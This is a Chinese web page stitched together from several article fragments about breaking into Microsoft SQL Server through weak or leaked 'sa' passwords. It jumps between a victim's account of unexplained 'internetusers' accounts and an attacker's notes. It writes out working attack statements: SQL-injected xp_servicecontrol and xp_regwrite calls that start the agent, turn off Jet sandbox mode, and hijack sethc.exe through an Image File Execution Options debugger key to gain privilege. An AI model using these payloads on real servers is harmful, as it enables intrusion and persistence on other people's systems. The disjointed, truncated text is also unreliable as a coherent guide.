不少网友反映操作系统突然出现了tsinternetus6r或tsinternetus7r这两个系统用户，那很可能因为安装的sqlserver的sa密码泄露导致被入侵了，情况类似于这篇文章介绍的，internetusers用户之谜。入侵者利用的是一款名为：Auto Repair 3389 per aggiungere ulteriori utenti di aggiungere pass trojan的工具添加的系统用户，而且这个工具还有传送木马并运行的功能。

尝试在NB里面恢复CMDSHELL、OACREAT都没有成功，所以开启SQLSERVERAGENT

;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';--还是没有成功，无奈之中希望寄托于沙盒模式，执行如下语句开启沙盒模式

;execmaster..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
...

同事的一台笔记本电脑装的xp系统，三番几次被人增加系统用户，用户名都internetusers，问问同事的笔记本电脑最近都做什么了，答复是一家软件公司给安装了一套数据库软件，这下基本明白怎么回事了，按了2次重启键，用以前的用户登录到系统，看到了sqlserver的运行图标，打开查询分析其，用sa登录，密码为空，登录成功，没检查是否有木马什么的。

Microsoft SQL Server SA权限服务器一直是黑客青睐的对象，笔者在51CTO网站也曾经发表过三篇相关的攻防文章（SA弱口令带来的安全隐患，Microsoft SQL Server SA弱口令攻防实战，SQL Server SA空口令的渗透测试日记），本文再向大家介绍几种入侵方法，读者可以根据情况找出防范办法。

sa权限如果xp_cmdshell不可用时，可以尝试用xp_regwrite写注册表，替换sethc.exe实现提权。

代码如下：sa提权技巧之xp_regwrite 替换sethc.exe

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'

本文技术交流与学习之用，请勿非法使用，产生任何后果本人概不负责。